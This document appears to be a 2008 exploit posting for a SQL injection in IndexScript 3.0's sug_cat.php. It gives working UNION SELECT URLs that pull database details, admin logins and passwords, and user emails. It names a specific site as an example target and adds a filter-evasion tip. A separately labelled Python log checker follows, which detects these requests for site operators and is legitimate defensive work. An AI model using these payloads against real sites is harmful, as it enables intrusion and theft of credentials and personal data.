IndexScript version 3.0 suffers from a remote SQL injection vulnerability in sug_cat.php.
[~]-------------------------------------------------------------------------------------------------------------
[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability
[~]
[~] http://www.indexscript.com/download.php
[~]
[~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.]
[~]
------------------------------------------------------------------------------------------------------------
[~] Bug found by d3v1l [Avram Marius]
[~]
[~] Date: 12.10.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~]
------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
[~]
[~] Example :-
[~]
[~] http://spaceho.com/sug_cat.php?parent_id=SQL
[~]-------------------------------------------------------------------------------------------------------------
[~] btw; on some sites you need to encrypt your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat]
[~]-------------------------------------------------------------------------------------------------------------
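
Added example, not part of the original advisory: a log check for site operators that flags any request to sug_cat.php whose parent_id is not a plain integer, which catches both the UNION form and the aes_decrypt(aes_encrypt( wrapped form without relying on keyword matching. It assumes combined-format access logs and that a legitimate parent_id is a non-negative integer; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation-range IPs).
# The two flagged requests reuse strings exactly as printed in the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Oct/2008:10:01:02 +0000] "GET /sug_cat.php?parent_id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [12/Oct/2008:10:03:44 +0000] "GET /sug_cat.php?parent_id=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())-- HTTP/1.1" 200 734
203.0.113.9 - - [12/Oct/2008:10:04:10 +0000] "GET /sug_cat.php?parent_id=-1+UNION+SELECT+aes_decrypt(aes_encrypt(concat HTTP/1.1" 200 701
198.51.100.7 - - [12/Oct/2008:10:05:00 +0000] "GET /index.php?parent_id=abc HTTP/1.1" 200 900
"""

# Captures: client, timestamp, request target (may contain raw spaces), status.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (.+?) HTTP/[0-9.]+" (\d{3})')
# Assumption: a legitimate parent_id is a non-negative integer category id.
VALID_ID_RE = re.compile(r"\d+")


def suspicious_requests(log_text, script="/sug_cat.php", param="parent_id"):
    """Return requests to `script` whose `param` is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        # parse_qs URL-decodes and keeps every repeat of the parameter, so
        # parent_id=1&parent_id=<payload> is still caught.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        bad = [v for v in values if not VALID_ID_RE.fullmatch(v)]
        if bad:
            hits.append({"client": client, "time": when,
                         "status": status, "value": bad[0]})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["status"], repr(hit["value"]))
```

The same integer-only rule, enforced in the application before the value reaches the query, closes the injection point that this check only detects.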